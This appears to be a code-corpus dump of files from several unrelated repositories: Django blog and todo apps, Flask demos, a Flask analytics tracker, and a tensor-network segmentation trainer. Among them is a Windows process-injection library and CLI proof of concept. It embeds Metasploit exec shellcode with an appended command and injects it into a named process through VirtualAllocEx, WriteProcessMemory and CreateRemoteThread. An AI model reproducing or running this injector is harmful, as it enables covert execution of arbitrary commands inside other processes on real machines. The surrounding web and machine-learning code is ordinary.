context['latest'] = Post.objects.all().order_by('-created_at')[:2]
context['aside'] = True
return context
class PostDelete(DeleteView):
model = Post
success_url = reverse_lazy('post_list')
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,886 | thallesdomician/blog-django | refs/heads/main | /post/migrations/0013_auto_20210208_2108.py | # Generated by Django 2.2.17 on 2021-02-08 21:08
from django.db import migrations, models
import tinymce.models
class Migration(migrations.Migration):
dependencies = [
('post', '0012_auto_20210208_2036'),
]
operations = [
migrations.AlterField(
model_name='post',
name='categories',
field=models.ManyToManyField(to='post.Category', verbose_name='Categories'),
),
migrations.AlterField(
model_name='post',
name='content',
field=tinymce.models.HTMLField(blank=True, null=True, verbose_name='Content'),
),
migrations.AlterField(
model_name='post',
name='created_at',
field=models.DateTimeField(auto_now_add=True, verbose_name='Created at'),
),
migrations.AlterField(
model_name='post',
name='header_image',
field=models.ImageField(blank=True, null=True, upload_to='header/%Y/%m/', verbose_name='Header Image'),
),
migrations.AlterField(
model_name='post',
name='resume',
field=models.TextField(blank=True, null=True, verbose_name='Resume'),
),
migrations.AlterField(
model_name='post',
name='subtitle',
field=models.CharField(max_length=255, verbose_name='Subtitle'),
),
migrations.AlterField(
model_name='post',
name='updated_at',
field=models.DateTimeField(auto_now=True, verbose_name='Updated at'),
),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,887 | thallesdomician/blog-django | refs/heads/main | /post/migrations/0001_initial.py | # Generated by Django 2.2.17 on 2021-01-28 04:35
import colorfield.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=15)),
('color_text', models.CharField(choices=[('w', 'white'), ('b', 'black')], default='b', max_length=1)),
('color_background', colorfield.fields.ColorField(default='#A5F8CE', max_length=18)),
],
options={
'verbose_name_plural': 'Categories',
},
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('subtitle', models.CharField(max_length=255)),
('header_image', models.ImageField(blank=True, null=True, upload_to='block-image/header')),
('thumbnail_image', models.ImageField(blank=True, null=True, upload_to='block-image/thumbnail')),
('resume', models.TextField(blank=True, null=True)),
('content', models.TextField(blank=True, null=True)),
('slug', models.SlugField(max_length=100, unique=True)),
('created_at', models.DateTimeField()),
('updated_at', models.DateTimeField(auto_now=True)),
('categories', models.ManyToManyField(to='post.Category')),
],
),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,888 | thallesdomician/blog-django | refs/heads/main | /post/admin.py | from django.contrib import admin
# Register your models here.
from django.utils.translation import ugettext_lazy as _
from .models import Post, PostAdmin, Category, CategoryAdmin
admin.site.register(Post, PostAdmin)
admin.site.register(Category, CategoryAdmin)
admin.site.site_header = _('Marcos\' Blog')
admin.site.index_title = _('Administration')
admin.site.site_title = _('Marcos\' Blog')
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,889 | thallesdomician/blog-django | refs/heads/main | /user/urls.py | from django.urls import path
from .views import detail
urlpatterns = [
path('', detail, name='detail'),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,890 | thallesdomician/blog-django | refs/heads/main | /post/migrations/0007_auto_20210129_0020.py | # Generated by Django 2.2.17 on 2021-01-29 00:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0006_auto_20210128_2323'),
]
operations = [
migrations.AlterField(
model_name='post',
name='header_image',
field=models.ImageField(blank=True, default='default_thumbnail.jpg', null=True, upload_to='header/%Y/%m/'),
),
]
| {"/post/urls.py": ["/post/views.py"], "/post/forms.py": ["/post/models.py"], "/post/views.py": ["/post/models.py", "/post/forms.py"], "/post/admin.py": ["/post/models.py"]} |
49,924 | i0Ek3/biatch | refs/heads/master | /train.py | #!/usr/bin/env python
# coding=utf-8
import numpy as np
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
def train(a):
w = tf.Variable(0, dtype=tf.float32)
x = tf.placeholder(tf.float32, [3,1])
cost = w ** 2 - 10 * w + 25
train = tf.train.GradientDescentOptimizer(a).minimize(cost)
init = tf.global_variables_initializer()
with tf.Session() as session:
session.run(init)
print(session.run(w))
| {"/main.py": ["/train.py"]} |
49,925 | i0Ek3/biatch | refs/heads/master | /main.py | #!/usr/bin/env python
# coding=utf-8
import train as t
def main():
anwser = input('Am I biatch? ')
if anwser:
print('Yah, exactly you\'re biatch!')
t.train(1 / len(anwser))
if __name__ == "__main__":
main()
| {"/main.py": ["/train.py"]} |
49,926 | frayer/docker-k8s-first-steps | refs/heads/master | /arguments/__init__.py | import argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('--port', '-p', type=int, required=False, help="port number", default=5000)
parser.add_argument('--host', type=str, required=False, help="port number", default='0.0.0.0')
args = parser.parse_args()
| {"/app.py": ["/arguments/__init__.py"]} |
49,927 | frayer/docker-k8s-first-steps | refs/heads/master | /app.py | from arguments import args
from flask import Flask, Response, json
import logging
import os
app = Flask(__name__)
LISTEN_HOST = args.host
LISTEN_PORT = args.port
@app.route('/')
def root():
data = json.dumps({
"appName": "python-flask-demo",
"version": "1.0.0",
"env": {
"host": os.getenv('HOSTNAME'),
"user_defined_1": os.getenv('USER_DEFINED_1'),
"user_defined_2": os.getenv('USER_DEFINED_2'),
"user_defined_3": os.getenv('USER_DEFINED_3')
}
})
return Response(data, mimetype="application/json")
if __name__ == '__main__':
app.run(host=LISTEN_HOST, port=LISTEN_PORT)
| {"/app.py": ["/arguments/__init__.py"]} |
49,939 | djangobat/todo-app | refs/heads/master | /apps/todos/templatetags/todo_tags.py | from django import template
from apps.todos.models import Topic
register = template.Library()
@register.filter
def bg_color(topic):
colors = [
'badge-primary', 'badge-success', 'badge-danger', 'badge-warning',
'badge-info', 'badge-dark'
]
index = topic.id % len(colors)
return colors[index]
| {"/apps/todos/templatetags/todo_tags.py": ["/apps/todos/models.py"], "/apps/todos/views.py": ["/apps/todos/models.py", "/apps/todos/filters.py"], "/apps/todos/filters.py": ["/apps/todos/models.py"], "/apps/todos/admin.py": ["/apps/todos/models.py"]} |
49,940 | djangobat/todo-app | refs/heads/master | /apps/todos/views.py | from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from .models import Topic, Task
from .forms import CreateTopicForm
from .filters import TaskFilter
@login_required
def todo(request):
topics = Topic.objects.filter(owner=request.user)
query = Task.objects.filter(topic__owner=request.user)
task_filter = TaskFilter(request.GET, queryset=query)
print(task_filter.qs)
context = {
'topics': topics,
'tasks': task_filter.qs,
'form': task_filter.form,
}
return render(request, 'todos/todo.html', context)
@login_required
def create_task(request):
user = request.user
return render(request, 'todos/task_create.html')
@login_required
def create_topic(request):
user = request.user
if request.method == 'POST':
form = CreateTopicForm(request.POST)
if form.is_valid():
new_topic = form.save(commit=False)
new_topic.owner = user
new_topic.save()
return redirect('todo')
else:
form = CreateTopicForm()
context = {
'form': form,
}
return render(request, 'todos/topic_create.html', context) | {"/apps/todos/templatetags/todo_tags.py": ["/apps/todos/models.py"], "/apps/todos/views.py": ["/apps/todos/models.py", "/apps/todos/filters.py"], "/apps/todos/filters.py": ["/apps/todos/models.py"], "/apps/todos/admin.py": ["/apps/todos/models.py"]} |
49,941 | djangobat/todo-app | refs/heads/master | /apps/todos/models.py | from django.db import models
from django.conf import settings
class Topic(models.Model):
title = models.CharField(max_length=100)
description = models.TextField(blank=True)
owner = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='topics')
def __str__(self):
return self.title
class Task(models.Model):
COMPLETED = 'C'
DELETED = 'D'
ICOMPLETE = 'I'
CURRENT_STATUS = (
(ICOMPLETE, '<i class="fas fa-question text-warning"></i>Chưa hoàn thành'),
(COMPLETED, '<i class="fas fa-check text-success"></i>Đã hoàn thành'),
(DELETED, '<i class="fas fa-trash text-danger"></i>Đã xóa'),
)
topic = models.ForeignKey(Topic, related_name='tasks', on_delete=models.CASCADE, blank=True)
title = models.CharField(max_length=100)
order = models.PositiveIntegerField(default=0)
status = models.CharField(max_length=1, choices=CURRENT_STATUS, default=ICOMPLETE)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
def is_completed(self):
return self.status == self.COMPLETED
class Meta:
ordering = ('order', '-created',) | {"/apps/todos/templatetags/todo_tags.py": ["/apps/todos/models.py"], "/apps/todos/views.py": ["/apps/todos/models.py", "/apps/todos/filters.py"], "/apps/todos/filters.py": ["/apps/todos/models.py"], "/apps/todos/admin.py": ["/apps/todos/models.py"]} |
49,942 | djangobat/todo-app | refs/heads/master | /apps/todos/filters.py | import django_filters
from datetime import timedelta
import calendar
from django import forms
from django.utils.timezone import localtime, now
from .models import Topic, Task
def filter_created(queryset, name, value):
no = localtime(now())
middle_no = no.replace(hour=0, minute=0, second=0)
if value == 'D':
return queryset.filter(created__gte=middle_no, created__lte=no)
elif value == 'W':
monday_of_this_week = middle_no - timedelta(days=(middle_no.isocalendar()[2] - 1))
monday_of_next_week = monday_of_this_week + timedelta(days=7)
return queryset.filter(created__gte=monday_of_this_week, created__lt=monday_of_next_week)
elif value == 'M':
first_day = calendar.firstweekday()
fist_weekday, number_of_days = calendar.monthrange(middle_no.year, middle_no.month)
first_day_of_this_month = middle_no.replace(day=1)
first_day_of_next_month = first_day_of_this_month + timedelta(days=number_of_days)
return queryset.filter(created__gte=first_day_of_this_month, created__lt=first_day_of_next_month)
return queryset
TIME_CHOICES = (
('D', 'Hôm nay'),
('W', 'Tuần này'),
('M', 'Tháng này'),
)
class TaskFilter(django_filters.FilterSet):
created = django_filters.ChoiceFilter(choices=TIME_CHOICES, widget=forms.Select, method=filter_created, empty_label='Tất cả')
class Meta:
model = Task
fields = ('topic', 'status', 'created', )
| {"/apps/todos/templatetags/todo_tags.py": ["/apps/todos/models.py"], "/apps/todos/views.py": ["/apps/todos/models.py", "/apps/todos/filters.py"], "/apps/todos/filters.py": ["/apps/todos/models.py"], "/apps/todos/admin.py": ["/apps/todos/models.py"]} |
49,943 | djangobat/todo-app | refs/heads/master | /apps/todos/admin.py | from django.contrib import admin
from .models import Topic, Task
admin.site.register(Topic)
admin.site.register(Task) | {"/apps/todos/templatetags/todo_tags.py": ["/apps/todos/models.py"], "/apps/todos/views.py": ["/apps/todos/models.py", "/apps/todos/filters.py"], "/apps/todos/filters.py": ["/apps/todos/models.py"], "/apps/todos/admin.py": ["/apps/todos/models.py"]} |
49,989 | hmyit/pycodeinjector | refs/heads/master | /pycIndolor.py | #!/usr/bin/python
import sys
from pycodeinjection import *
def banner() :
print("""
|________|_____________________|_
| | | | | | | | | | | | | |________________
|________|_P_y_c_I_n_d_o_l_o_r_|_|
| | |
Simple PoC for pycodeinjection library
Proudly developed by Andrea Fortuna
andrea@andreafortuna.org
https://www.andreafortuna.org
""")
def usage():
print ("python " + sys.argv[0] + " <process to inject> <commands to inject>")
banner()
if len(sys.argv) < 3:
usage()
sys.exit(0)
print ("* Search process " + sys.argv[1])
target_pid = getPID(sys.argv[1])
if target_pid == 0:
print ("\tProcess " + sys.argv[1] + " non accessible...exiting!")
sys.exit(0)
print ("* Process found, start injection...")
shellcode = generateShellcode(sys.argv[2])
if injectShellcode(target_pid, shellcode):
print ("\tThread started!")
else:
print ("\tInjection failed")
| {"/pycIndolor.py": ["/pycodeinjection.py"]} |
49,990 | hmyit/pycodeinjector | refs/heads/master | /pycodeinjection.py | from ctypes import *
from win32com.client import GetObject
def getPID(processname):
WMI = GetObject('winmgmts:')
p = WMI.ExecQuery('select * from Win32_Process where Name="%s"' %(processname))
if len(p) == 0:
return 0
return p[0].Properties_('ProcessId').Value
def generateShellcode(cmdString):
# Windows Exec Shellcode Sourced from the Metasploit Framework
# http://www.rapid7.com/db/modules/payload/windows/exec
shellcode = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" + \
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" + \
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" + \
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" + \
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" + \
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" + \
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" + \
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" + \
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" + \
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d" + \
"\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb" + \
"\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" + \
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" + \
"\xff\xd5" + cmdString + "\x00"
return shellcode
# Injects shellcode: Takes in shellcode as string, converts to bytearray
def injectShellcode(pid, shellcode):
shellCode = bytearray(shellcode)
process_handle = windll.kernel32.OpenProcess(0x1F0FFF, False, pid) #get handle of target process
memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, None, len(shellcode), 0x1000, 0x40) #allocate memory for shellcode in target process
windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, len(shellcode), None) #write shellcode into allocated memory
if not windll.kernel32.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, None, 0, None): #start thread with injected code
return False
return True
| {"/pycIndolor.py": ["/pycodeinjection.py"]} |
49,998 | Straffern/strided-tenet | refs/heads/main | /data/datasets.py | import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torchvision.utils import save_image
import torchvision.transforms as transforms
from torch.utils.data import TensorDataset, DataLoader, Dataset
from kornia.color import RgbToGrayscale
import pdb
import numpy as np
import itertools
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
def fold2d(x,b=1):
"""
Torch fold does not invert unfold! So a sloppy version that does the job.
"""
d0 = int(np.sqrt(x.shape[0] / b))
h = x.shape[-1]
w = x.shape[-2]
y = torch.zeros(b,int(d0*h),int(d0*w)).to(device)
x = x.view(b,d0,d0,h,w)
for i in range(d0):
for j in range(d0):
y[:,i*h:(i+1)*h,j*w:(j+1)*w] = x[:,i,j]
return y
def squeeze(x,kernel=3):
"""
Stack neighbourhood information per pixel
along feature dimension
"""
k = kernel // 2
idx = [list(i) for i in itertools.product(range(-k,k+1),range(-k,k+1))]
xPad = torch.zeros(x.shape[0]+kernel-1,x.shape[1]+kernel-1)
xPad[k:-k,k:-k] = x
xSqueezed = [torch.roll(xPad,shifts=(i[0],i[1]),dims=(0,1)) for i in idx]
xSqueezed = torch.stack(xSqueezed)
return xSqueezed[:,k:-k,k:-k]
class lungCXR(Dataset):
def __init__(self, split='Train', data_dir = './',
fold=0,transform=None):
super().__init__()
self.data_dir = data_dir
self.transform = transform
folds = [0,1,2,3]
folds.remove(fold)
if split == 'Valid':
self.data, self.targets = torch.load(data_dir+'Fold'+repr(folds[0])+'.pt')
elif split == 'Train':
data0, targets0 = torch.load(data_dir+'Fold'+repr(folds[1])+'.pt')
data1, targets1 = torch.load(data_dir+'Fold'+repr(folds[2])+'.pt')
self.data = torch.cat((data0,data1),dim=0)
self.targets = torch.cat((targets0,targets1),dim=0)
else:
self.data, self.targets = torch.load(data_dir+'Fold'+repr(fold)+'.pt')
self.targets = self.targets.type(torch.FloatTensor)
self.data = self.data.squeeze().unsqueeze(3)
self.targets = self.targets.squeeze().unsqueeze(3)
def __len__(self):
return len(self.targets)
def __getitem__(self, index):
image, label = self.data[index], self.targets[index]
if self.transform is not None:
transformed = self.transform(image=image.numpy(),mask=label.numpy())
image = transformed["image"]
label = transformed["mask"]
return image, label.squeeze()
class MoNuSeg(Dataset):
def __init__(self, split='Train', data_dir = './',transform=None):
super().__init__()
gray = RgbToGrayscale()
self.data_dir = data_dir
self.transform = transform
self.data, self.targets = torch.load(data_dir+split+'.pt')
self.data = self.data.permute(0,3,1,2)[:,[0]].squeeze().unsqueeze(3)
self.targets = self.targets.squeeze().unsqueeze(3)
def __len__(self):
return len(self.targets)
def __getitem__(self, index):
image, label = self.data[index], self.targets[index]
if self.transform is not None:
transformed = self.transform(image=image.numpy(),mask=label.numpy())
image = transformed["image"]
label = transformed["mask"]
return image, label.squeeze()
| {"/train.py": ["/data/datasets.py"]} |
49,999 | Straffern/strided-tenet | refs/heads/main | /train.py | #!/usr/bin/env python3
import time
import torch
from models.mps import MPS
from torchvision import transforms, datasets
import pdb
from data.datasets import *
from utils.tools import *
import argparse
from carbontracker.tracker import CarbonTracker
from sklearn.metrics import precision_recall_curve, average_precision_score
from torchvision.utils import save_image
import torch.nn.functional as F
import albumentations as A
from albumentations.pytorch import ToTensorV2
import sys
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
# Globally load device identifier
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
def evaluate(loader,optThresh=0.5,testMode=False,plot=False,mode='Valid',post=False):
### Evaluation function for validation/testing
vl_acc = torch.Tensor([0.]).to(device)
vl_loss = 0.
labelsNp = []
predsNp = []
model.eval()
for i, (inputs, labels) in enumerate(loader):
b = inputs.shape[0]
labelsNp = labelsNp + labels.numpy().tolist()
# Make patches on the fly
inputs = inputs.unfold(2,dim[0],dim[1]).unfold(3,dim[0],\
dim[1]).reshape(-1,nCh,dim[0],dim[1])
b = inputs.shape[0]
# Flatten to 1D vector as input to MPS
inputs = inputs.view(b,nCh,-1)
inputs = inputs.to(device)
labels = labels.to(device)
# Inference
scores = torch.sigmoid(model(inputs))
scores[scores.isnan()] = 0
# Put patches back together
scores = fold2d(scores.view(-1,dim[0],dim[1]),labels.shape[0])
preds = scores.clone()
loss = loss_fun(scores.view(-1,H,W), labels)
predsNp = predsNp + preds.cpu().numpy().tolist()
vl_loss += loss.item()
vl_acc += accuracy(labels,preds.view(-1,H,W))
# Compute AUC over the full (valid/test) set
labelsNp, predsNp = np.array(labelsNp), np.array(predsNp)
fpr, tpr, thresh = precision_recall_curve(labelsNp.reshape(-1), predsNp.reshape(-1))
if not testMode:
alpha = 0.7
gmeans = 2*fpr*tpr/(fpr+tpr)
gmeans[np.isnan(gmeans)] = 0
idx = np.argmax(gmeans)
optThresh = thresh[idx]
print("Opt Thresh: %.4f with Acc %.4f"%(thresh[idx],gmeans[idx]))
acc_, acc_sample = accuracy(torch.Tensor(labelsNp),\
torch.Tensor((predsNp >= optThresh).astype(float)),True)
acc_std = torch.std(acc_sample)
if mode is 'Test':
acc_sample = acc_sample.cpu().data.numpy()
print("Min.%.4f [%d]"%(acc_sample.min(),np.argmin(acc_sample)))
print("Max.%.4f [%d]"%(acc_sample.max(),np.argmax(acc_sample)))
print(mode+" Acc: %.2f +/- %.2f"%(acc_,acc_std))
vl_acc = average_precision_score(labelsNp.reshape(-1), predsNp.reshape(-1))
vl_loss = vl_loss/len(loader)
if plot:
k = 32
k = (labels.shape[0] if labels.shape[0] < k else k)
tmp = torch.zeros(k,3,H,W).to(device)
pred = ((preds[:k].view(-1,H,W) >= optThresh).float() \
+ 2*labels[:k])
### FN
tmp[:k,0,:,:][pred==1] = 0.55
tmp[:k,1,:,:][pred==1] = 0.29
tmp[:k,2,:,:][pred==1] = 0.39
### FP
tmp[:k,0,:,:][pred==3] = 0.13
tmp[:k,1,:,:][pred==3] = 0.60
tmp[:k,2,:,:][pred==3] = 0.20
## TP
tmp[:k,0,:,:][pred==2] = 0.6
tmp[:k,1,:,:][pred==2] = 0.6
tmp[:k,2,:,:][pred==2] = 0.6
save_image(tmp,'vis/ep'+repr(epoch)+'.jpg')
labelsNp, predsNp = np.array(labelsNp), np.array(predsNp)
return vl_acc, vl_loss, optThresh
#### MAIN STARTS HERE ####
parser = argparse.ArgumentParser()
parser.add_argument('--num_epochs', type=int, default=100, help='Number of training epochs')
parser.add_argument('--batch_size', type=int, default=4, help='Batch size')
parser.add_argument('--fold', type=int, default=0, help='Fold to use for testing')
parser.add_argument('--feat', type=int, default=4, help='Number of local features')
parser.add_argument('--lr', type=float, default=5e-4, help='Learning rate')
parser.add_argument('--l2', type=float, default=0, help='L2 regularisation')
parser.add_argument('--p', type=float, default=0.5, help='Augmentation probability')
parser.add_argument('--aug', action='store_true', default=False, help='Use data augmentation')
parser.add_argument('--save', action='store_true', default=False, help='Save model')
parser.add_argument('--data', type=str, default='data/lungCXR/',help='Path to data.')
parser.add_argument('--bond_dim', type=int, default=2, help='MPS Bond dimension')
parser.add_argument('--kernel', type=int, default=4, help='Stride of squeeze kernel')
parser.add_argument('--seed', type=int, default=1, help='Random seed')
# Visualization and log dirs
if not os.path.exists('vis'):
os.mkdir('vis')
if not os.path.exists('logs'):
os.mkdir('logs')
logFile = 'logs/'+time.strftime("%Y%m%d_%H_%M")+'.txt'
makeLogFile(logFile)
args = parser.parse_args()
# Assign script args to vars
torch.manual_seed(args.seed)
batch_size = args.batch_size
kernel = args.kernel
feature_dim = args.feat
### Data processing and loading....
trans_valid = A.Compose([ToTensorV2()])
if args.aug:
trans_train = A.Compose([A.ShiftScaleRotate(shift_limit=0.5, \
scale_limit=0.5, rotate_limit=30, p=args.p),ToTensorV2()])
print("Using Augmentation with p=%.2f"%args.p)
else:
trans_train = trans_valid
print("No augmentation....")
print("Using Lung CXR dataset")
print("Using Fold: %d"%args.fold)
dataset_valid = lungCXR(split='Valid', data_dir=args.data,
transform=trans_valid,fold=args.fold)
dataset_train = lungCXR(split='Train', data_dir=args.data,fold=args.fold,
transform=trans_train)
dataset_test = lungCXR(split='Test', data_dir=args.data,fold=args.fold,
transform=trans_valid)
# Initiliaze input dimensions
dim = torch.ShortTensor(list(dataset_valid[0][0].shape[1:]))
nCh = int(dataset_valid[0][0].shape[0])
H = dim[0]
W = dim[1]
output_dim = H*W # Same as the number of pixels
num_train = len(dataset_train)
num_valid = len(dataset_valid)
num_test = len(dataset_test)
print("Num. train = %d, Num. val = %d, Num. test = %d"%(num_train,num_valid,num_test))
# Initialize dataloaders
loader_train = DataLoader(dataset = dataset_train, drop_last=False,num_workers=1,
batch_size=batch_size, shuffle=True,pin_memory=True)
loader_valid = DataLoader(dataset = dataset_valid, drop_last=True,num_workers=1,
batch_size=batch_size, shuffle=False,pin_memory=True)
loader_test = DataLoader(dataset = dataset_test, drop_last=True,num_workers=1,
batch_size=batch_size, shuffle=False,pin_memory=True)
nValid = len(loader_valid)
nTrain = len(loader_train)
nTest = len(loader_test)
# Initialize the models
dim = dim//args.kernel
print("Using Strided Tenet with patches of size",dim)
output_dim = torch.prod(dim)
model = MPS(input_dim=torch.prod(dim),
output_dim=output_dim,
bond_dim=args.bond_dim,
feature_dim=feature_dim*nCh,
lFeat=feature_dim)
model = model.to(device)
# Initialize loss and metrics
accuracy = dice
loss_fun = dice_loss()
# Initialize optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr,
weight_decay=args.l2)
nParam = sum(p.numel() for p in model.parameters() if p.requires_grad)
print("Number of parameters:%d"%(nParam))
print(f"Maximum MPS bond dimension = {args.bond_dim}")
print(f"Using Adam w/ learning rate = {args.lr:.1e}")
print("Local feature map dim: %d, nCh: %d, B:%d"%(feature_dim,nCh,batch_size))
with open(logFile,"a") as f:
print("Bond dim: %d"%(args.bond_dim),file=f)
print("Number of parameters:%d"%(nParam),file=f)
print(f"Using Adam w/ learning rate = {args.lr:.1e}",file=f)
print("Local feature map dim: %d, nCh: %d, B:%d"%(feature_dim,nCh,batch_size),file=f)
# Miscellaneous initialization
start_time = time.time()
maxAuc = -1
minLoss = 1e3
convCheck = 10
convIter = 0
# Instantiate Carbontracker
tracker = CarbonTracker(epochs=args.num_epochs,
log_dir='carbontracker/',monitor_epochs=-1)
# Training starts here
for epoch in range(args.num_epochs):
tracker.epoch_start()
running_loss = 0.
running_acc = 0.
t = time.time()
model.train()
predsNp = []
labelsNp = []
bNum = 0
for i, (inputs, labels) in enumerate(loader_train):
for p in model.parameters():
p.grad = None
bNum += 1
b = inputs.shape[0]
# Make patches on the fly
inputs = inputs.unfold(2,dim[0],dim[1]).unfold(3,dim[0],\
dim[1]).reshape(-1,nCh,dim[0],dim[1])
labels = labels.unfold(1,dim[0],dim[1]).unfold(2,dim[0],\
dim[1]).reshape(-1,dim[0],dim[1])
b = inputs.shape[0]
# Flatten to 1D vector as input to MPS
inputs = inputs.view(b,nCh,-1)
labelsNp = labelsNp + (labels.numpy()).tolist()
inputs = inputs.to(device)
labels = labels.to(device)
scores = torch.sigmoid(model(inputs))
loss = loss_fun(scores.view(-1), labels.view(-1))
# Backpropagate and update parameters
loss.backward()
optimizer.step()
with torch.no_grad():
preds = scores.clone()
predsNp = predsNp + (preds.data.cpu().numpy()).tolist()
running_acc += accuracy(labels,preds)
running_loss += loss
if (i+1) % 10 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, args.num_epochs, i+1, nTrain, loss.item()))
tr_acc = running_acc/nTrain
# Evaluate on Validation set
with torch.no_grad():
if tr_acc.isnan():
print('NaN error!')
break
vl_acc, vl_loss, optThresh = evaluate(loader_valid,testMode=True,plot=False)
if vl_acc > maxAuc or vl_loss < minLoss:
convIter = 0
if args.save:
torch.save(model.state_dict(),'saved_models/'+logFile.replace('.txt','.pt'))
if (vl_acc > maxAuc) or (vl_acc >= maxAuc and vl_loss < minLoss):
### Predict on test set if new optimum
maxAuc = vl_acc
print('New Best: %.4f'%np.abs(maxAuc))
ts_acc, ts_loss, _ = evaluate(loader=loader_test,\
optThresh=optThresh,testMode=True,plot=True,mode='Test')
print('Test Set Loss:%.4f\t Acc:%.4f'%(ts_loss, ts_acc))
with open(logFile,"a") as f:
print('Test Set Loss:%.4f\tAcc:%.4f'%(ts_loss, ts_acc),file=f)
convEpoch = epoch
elif vl_loss < minLoss:
minLoss = vl_loss
else:
convIter += 1
if convIter == convCheck:
print("Converged at epoch:%d with AUC:%.4f"%(convEpoch+1,maxAuc))
break
writeLog(logFile, epoch, running_loss/bNum, tr_acc,
vl_loss, np.abs(vl_acc), time.time()-t)
tracker.epoch_end()
tracker.stop()
| {"/train.py": ["/data/datasets.py"]} |
50,018 | melqueawq/analytics | refs/heads/master | /view/views.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from flask import request, render_template, send_file
from ._app import (app, getLogger, conversion, campaign,
config, uid_entry, db)
from .models import LogTable
import datetime
import base64
import io
import urllib.parse
import time
import sys
@app.route('/')
def index():
return render_template('index.html')
@app.route('/entry.js')
def entry_js():
cid = request.args.get('cid')
filename = 'user_js/' + str(cid) + '.js'
# cookieからuid読み出し
uid = request.cookies.get('uid', None)
# uidがなければ作成
if not uid:
uid = '{0:.0f}'.format(time.time()*100)
# uidを登録
uid_entry(cid, uid)
with open(filename, 'r') as f:
js = f.read()
# uidを置き換え
js = js.replace('[!uid]', uid)
# 画像にタグ埋め込み
js += 'image.src = location.protocol + "//127.0.0.1:5000/entry?"' \
+ ' + "cid=" + "1" + "&time=" + now.getTime()' \
+ ' + "&url=" + String(window.location).replace("&", "*")' \
+ ' + "&ref=" + String(document.referrer).replace("&", "*")' \
+ ' + "&uid=" + uid'
if('p' in request.args):
js += '+ "¶m=' + str(request.args.get('p')) + '"'
js += ";"
return js
@app.route('/entry')
def entry():
# 1x1GIF
gif = 'R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw =='
gif_str = base64.b64decode(gif)
url = urllib.parse.urlparse(request.args.get('url'))
# 拒否
if url.path in config['ignorepage']:
return send_file(io.BytesIO(gif_str), mimetype='image/gif')
url_qs = urllib.parse.parse_qs(url.query.replace('*', '&'))
# コンバージョン
if '--debug' in sys.argv:
if 'param' in request.args:
conversion(request)
# 媒体
if 'ad' in url_qs:
campaign(url_qs['ad'][0], request)
query = ''
for a in request.args:
query += request.args.get(a) + ', '
now = datetime.datetime.now()
ip = request.remote_addr
# ログ出力
logger = getLogger(__name__, 'entry.log')
logger.info('{0:%Y/%m/%d %H:%M:%S} - '.format(now) + ip + ' - ' + query)
# DB保存
row = LogTable(
cid=request.args.get('cid'),
uid=request.args.get('uid'),
ip=ip,
url=request.args.get('url'),
referrer=request.args.get('ref'),
param=request.args.get('param') if 'param' in request.args else None
)
LogTable.save_to_db(row)
return send_file(io.BytesIO(gif_str), mimetype='image/gif')
| {"/view/views.py": ["/view/_app.py", "/view/models.py"], "/view/models.py": ["/view/_app.py"], "/view/_app.py": ["/view/models.py"]} |
50,019 | melqueawq/analytics | refs/heads/master | /view/models.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
